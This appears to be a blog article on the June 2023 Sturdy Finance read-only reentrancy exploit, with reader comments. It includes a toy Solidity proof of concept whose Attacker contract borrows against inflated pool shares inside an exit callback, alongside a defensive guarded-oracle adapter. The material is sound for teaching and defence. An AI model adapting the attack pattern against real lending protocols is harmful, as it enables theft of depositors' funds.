
Sturdy Finance Drained of $800K in Read-Only Reentrancy Exploit

The decentralized finance ecosystem suffered another blow on June 12, 2023, when Sturdy Finance, an Ethereum-based lending protocol, was drained of approximately 442 ETH, worth roughly $800,000 at the time. The exploit, executed at 01:06:35 AM UTC in block 17460610, combined a read-only reentrancy flaw in a Balancer pool with manipulation of the price Sturdy's oracle derived from that pool, letting the attacker borrow real WETH against collateral the protocol had been tricked into overvaluing. With Bitcoin trading at approximately $25,902 and Ethereum at $1,742 at the time, the loss was significant for a mid-sized DeFi platform operating in a market already unsettled by the SEC's recent enforcement actions against Binance and Coinbase.

The Exploit Mechanics

The attacker opened with a flash loan of roughly 110,000 ETH, which supplied the capital to move the pool's state without posting any collateral of their own. The vulnerable component was the pricing of B-wst-ETH, the token representing a share of Balancer's B-stETH-STABLE pool, which Sturdy accepted as collateral and valued using the rate the pool itself reports. That rate is computed from the pool's token balances and the outstanding supply of pool tokens. During a pool exit those two quantities are not updated atomically: when the exit pays out ETH, control passes to the recipient while the supply has already been reduced but the recorded balances have not, so any contract that reads the rate in that window sees a figure derived from inconsistent state. Because reading the rate is a view call, no reentrancy guard on the pool's state-changing functions intervenes; that is what distinguishes read-only reentrancy from the classic form, where the attacker re-enters a function that writes state.

The attacker exploited exactly that window, inflating the reported price of B-wst-ETH from approximately 1 ETH to 3 ETH, and, still inside the callback, deposited B-wst-ETH into Sturdy as collateral and borrowed WETH against the inflated valuation. Once the exit completed and the rate returned to normal, the positions were deeply under-collateralized and the borrowed WETH was gone. The sequence was repeated five times within a single transaction, using five smart contracts deployed specifically for the attack. The Balancer Vault behaviour that opens this window had been publicly identified as a read-only reentrancy risk in February 2023, but not every protocol pricing Balancer pool tokens had added the check Balancer recommends for integrators, and Sturdy's oracle was among those that read the rate unguarded.
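The ordering described above, reduced to a toy, as an added example that is not code from Balancer, Sturdy or the attacker: ToyPool, ToyLender and Attacker are illustrative names, the pool holds a single asset rather than wstETH and WETH, and the flash loan is replaced by ETH the caller simply supplies. The pool's exit burns shares, pays ETH with a full-gas call, and only then updates its cash accounting, so getRate() read during the payout is inflated; the lender trusts that read.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

// Added toy of the bug class. ToyPool, ToyLender and Attacker are illustrative;
// none of this is Balancer's, Sturdy's or the attacker's code.

// Single-asset pool whose share price, getRate(), is derived from two storage
// values that exit() updates at different moments: totalSupply and cash.
contract ToyPool {
    uint256 public totalSupply;   // shares outstanding
    uint256 public cash;          // the pool's own accounting of ETH it holds
    bool public inExit;           // true while an exit is mid-flight
    mapping(address => uint256) public balanceOf;
    mapping(address => mapping(address => uint256)) public allowance;

    // Deposit ETH, mint shares at the current rate (1:1 for the first deposit).
    function join() external payable {
        uint256 minted = totalSupply == 0 ? msg.value : msg.value * totalSupply / cash;
        balanceOf[msg.sender] += minted;
        totalSupply += minted;
        cash += msg.value;
    }

    // Burn shares, pay ETH, and only then update cash. The payout is a plain
    // call that forwards all gas, so the recipient runs code while totalSupply
    // is already reduced and cash is not.
    function exit(uint256 shares) external {
        inExit = true;
        uint256 amount = shares * cash / totalSupply;
        balanceOf[msg.sender] -= shares;
        totalSupply -= shares;
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "payout failed");
        cash -= amount;
        inExit = false;
    }

    // ETH per share, 1e18-scaled. A view, so no guard on the pool's
    // state-changing functions is consulted; it reads whatever exit() left.
    function getRate() external view returns (uint256) {
        return cash * 1e18 / totalSupply;
    }

    function approve(address spender, uint256 shares) external { allowance[msg.sender][spender] = shares; }

    function transferFrom(address from, address to, uint256 shares) external {
        allowance[from][msg.sender] -= shares;
        balanceOf[from] -= shares;
        balanceOf[to] += shares;
    }
}

// Lender that values pool shares with getRate() and lends ETH at 80% LTV.
contract ToyLender {
    ToyPool public immutable pool;
    mapping(address => uint256) public collateralShares;
    mapping(address => uint256) public debt;

    constructor(ToyPool p) payable { pool = p; }  // funded with lendable ETH

    function depositAndBorrow(uint256 shares) external {
        pool.transferFrom(msg.sender, address(this), shares);
        collateralShares[msg.sender] += shares;
        // The vulnerable read: getRate() is trusted even if the pool is mid-exit.
        uint256 value = collateralShares[msg.sender] * pool.getRate() / 1e18;
        uint256 amount = value * 80 / 100 - debt[msg.sender];
        debt[msg.sender] += amount;
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "lend failed");
    }
}

// Joins with (in the real attack, flash-loaned) ETH, exits most of its shares,
// and in the exit's payout callback borrows against the few shares it kept.
contract Attacker {
    ToyPool immutable pool;
    ToyLender immutable lender;
    uint256 public borrowed;      // ETH received from the lender

    constructor(ToyPool p, ToyLender l) { pool = p; lender = l; }

    function run(uint256 keepShares) external payable {
        pool.join{value: msg.value}();
        uint256 shares = pool.balanceOf(address(this));
        pool.approve(address(lender), keepShares);
        pool.exit(shares - keepShares);   // control comes back in receive()
    }

    receive() external payable {
        if (msg.sender == address(pool)) {
            // Inside the window: totalSupply shrunk, cash not yet, rate inflated.
            lender.depositAndBorrow(pool.balanceOf(address(this)));
        } else {
            borrowed += msg.value;
        }
    }
}
```

To walk it through: deploy ToyPool, let an unrelated account join with 10 ETH, deploy ToyLender funded with 50 ETH, then call Attacker.run{value: 100 ether}(5e18). After the join the pool holds 110 ETH against 110e18 shares and getRate() is 1e18. The exit of 95e18 shares leaves 15e18 shares while cash still reads 110e18, so inside the callback getRate() returns about 7.33e18, the 5e18 retained shares are valued at roughly 36.7 ETH, and the lender pays out about 29.3 ETH against collateral that is worth 5 ETH the moment the exit completes and the rate returns to 1e18. Replacing the pool's `call` with `transfer` would starve this particular callback of gas but would not make the rate read correct; the fix belongs in the consumer of the rate, not in the pool's payout path.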

Affected Systems

The attack directly hit Sturdy Finance's lending pools. Sturdy's model differs from conventional lending protocols: lenders do not earn from an interest rate paid by borrowers but from yield generated by farming the borrowers' collateral. The funds drained were therefore lenders' deposited WETH, lent out against collateral the protocol had been tricked into overvaluing. The attacker drained the pool's balance through the five deployed contracts; once the manipulated rate reverted, the positions were under-collateralized, and although Sturdy's contract liquidated the collateral in an attempt to limit losses, the collateral was now worth only its true value and little could be recovered. The protocol was left with roughly 11 ETH in the affected pool. The incident also illustrates the interconnected risk in DeFi: the exploitable behaviour lived in Balancer's infrastructure, but the loss landed on Sturdy, the protocol that consumed Balancer's rate without checking the conditions under which it was read. Within minutes of the initial attack, at 01:08:23 AM UTC, the attacker began routing the stolen funds through Tornado Cash, the sanctioned cryptocurrency mixer, which makes recovery exceedingly difficult.

The Mitigation Strategy

Sturdy Finance publicly acknowledged the breach at 09:19 AM UTC the same day. By 08:25:35 PM UTC the team had sent an on-chain message to the attacker proposing a white-hat deal: a $100,000 bounty in exchange for the return of the remaining funds, with a promise of no legal action. The approach is common after DeFi incidents and underlines how little recourse a protocol has once funds have passed through a mixer such as Tornado Cash. The technical mitigation lies with the consumers of composable infrastructure. A reentrancy guard on the pool's own state-changing functions does nothing here, because the attacker never re-enters them; the attacker re-enters the lending protocol, which then makes a view call into a pool whose state is mid-update. Protocols that price collateral from another contract's reported rate therefore need to check that the upstream contract is not mid-operation before trusting the value (the check Balancer recommends to integrators does exactly this by probing the Vault), validate the rate against an independent oracle, bound how far an accepted price may move per update, and halt borrowing when a deviation threshold is exceeded rather than proceeding on a number that cannot be right.
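One way to implement those checks as a price adapter in front of the lender, as an added example that is not Sturdy's code: IPool is a hypothetical interface, getRate() stands for the share price a pool reports, and inExit() is an assumed getter exposing whether the pool is mid-operation. Balancer's published integrator helper (VaultReentrancyLib.ensureNotInVaultContext) establishes the same fact by probing the Vault and checking that it reports reentrancy; the assumed flag stands in for that probe. The adapter refuses to read inside the window, bounds how far the accepted rate may move per interval, returns the conservative value for collateral, and gives a guardian a halt switch.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

// Added example of a guarded collateral price adapter, not Sturdy's code.
// IPool is hypothetical: inExit() is assumed to expose whether the pool is
// mid-operation; Balancer's real integrator check probes the Vault instead.
interface IPool {
    function getRate() external view returns (uint256);
    function inExit() external view returns (bool);
}

contract GuardedRateOracle {
    IPool public immutable pool;
    address public immutable guardian;
    uint256 public immutable maxDeviationBps;  // allowed move vs. accepted rate, 500 = 5%
    uint256 public immutable minInterval;      // seconds between accepted updates
    uint256 public lastRate;                   // last rate this adapter accepted
    uint256 public lastUpdated;                // when it was accepted
    bool public halted;

    constructor(IPool p, address g, uint256 devBps, uint256 interval) {
        pool = p; guardian = g; maxDeviationBps = devBps; minInterval = interval;
        require(!p.inExit(), "pool mid-operation");
        lastRate = p.getRate();
        lastUpdated = block.timestamp;
    }

    // Collateral price read used by the lender. Every check reverts rather
    // than serving a value: a borrow should fail, not succeed on a bad number.
    function collateralRate() external returns (uint256) {
        require(!halted, "oracle halted");
        // 1. Refuse to read while the pool is mid-operation. This closes the
        //    read-only reentrancy window regardless of who opened it.
        require(!pool.inExit(), "pool mid-operation");
        uint256 r = pool.getRate();
        // 2. Bound the move against the last accepted rate. A 1e18 -> 3e18
        //    jump fails this even if it were read outside the window.
        uint256 diff = r > lastRate ? r - lastRate : lastRate - r;
        require(diff * 10_000 <= lastRate * maxDeviationBps, "rate deviation");
        // 3. Accept at most one update per interval, so the anchor can drift
        //    no faster than maxDeviationBps per minInterval.
        if (block.timestamp >= lastUpdated + minInterval) {
            lastRate = r;
            lastUpdated = block.timestamp;
        }
        // 4. For collateral valuation the conservative answer is the lower one.
        return r < lastRate ? r : lastRate;
    }

    // Guardian-operated circuit breaker: halt during an incident, then
    // re-anchor the accepted rate explicitly before resuming.
    function halt() external {
        require(msg.sender == guardian, "not guardian");
        halted = true;
    }

    function resume(uint256 anchorRate) external {
        require(msg.sender == guardian, "not guardian");
        lastRate = anchorRate;
        lastUpdated = block.timestamp;
        halted = false;
    }
}
```

With maxDeviationBps set to 500 and minInterval to 3600, the attack path described above is rejected twice over: inExit() is true inside the exit callback, and a rate of 3e18 against an accepted 1e18 exceeds the 5% bound in any case. The same bound trips on a genuine large move, such as a depeg of the pool's underlying, and the adapter then reverts until the guardian re-anchors it; that is the intended trade-off of a circuit breaker, and the lender's borrow path should fail closed in the meantime. Note that collateralRate() is not a view, because it records the accepted rate, so the lender must call it as a state-changing call.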

Lessons Learned

The Sturdy Finance exploit reinforces several lessons for the DeFi community. First, composability cuts both ways: shared infrastructure like Balancer enables innovation, but it also creates shared attack surface, and a read of another protocol's state that is safe in isolation can be unsafe at the moment the attacker chooses to trigger it. Second, flash loans remain a potent weapon, turning a manipulation that would once have required enormous capital into one that costs only gas. Third, the speed of DeFi attacks demands real-time monitoring and automated response rather than reactive mitigation: the entire Sturdy exploit, all five rounds included, completed within a single transaction, so no human could have intervened. Fourth, price oracle security remains one of the most critical attack vectors in DeFi; protocols must combine sources, apply sanity checks and deviation thresholds, and treat a rate read from a pool that is mid-operation as untrusted.

User Action Required

For users who had funds deposited in Sturdy Finance, the immediate priority is to assess exposure to the affected pools and withdraw from any remaining active positions until the protocol confirms that all vulnerabilities have been patched. More broadly, DeFi users should evaluate their exposure to protocols that rely on single oracle sources or that have dependencies on recently compromised infrastructure. Diversifying across multiple protocols with different risk profiles, maintaining awareness of smart contract audit reports, and monitoring on-chain activity through tools like EigenPhi and Phalcon can provide early warning of potential exploits. In a market where Bitcoin hovers near $26,000 and regulatory pressure from the SEC continues to reshape the landscape, vigilance in DeFi security has never been more important.

Disclaimer: This article is for informational purposes only and does not constitute financial advice. Always conduct your own research before engaging with DeFi protocols.


8 thoughts on “Sturdy Finance Drained of $800K in Read-Only Reentrancy Exploit”

  1. 110k ETH flash loan to steal 442 ETH. The leverage ratio on that attack is wild, basically zero capital risk for the attacker

    1. The B-wst-ETH composite token was the weak link. Any protocol composing Balancer pools needs to recheck their oracle logic after this one

    2. The attacker risked nothing because flash loans require zero collateral. This is the fundamental asymmetry in DeFi security. Upside for the attacker is infinite, downside is gas fees

    3. flashloan_jeff

      110k ETH flash loan for 442 ETH net. Attacker risked literally zero of their own capital and walked away with $800K. DeFi security is broken

  2. Marta Kowalczyk

    Read-only reentrancy keeps showing up. Balancer had a similar pattern in their vault code. Surprising Sturdy didn’t audit for it after that.

    1. Exactly. Balancer v2 had the same read-only reentrancy vector documented in their own post-mortem. Sturdy composing on top without adding their own check is negligence tbh

    2. Balancer had the exact same pattern and yet downstream protocols still composed on top without checking. Don't trust, verify goes both ways

  3. Read-only reentrancy is such a nasty class of bugs because the state looks clean in a normal audit. You need to specifically test for cross-contract calls during price reads

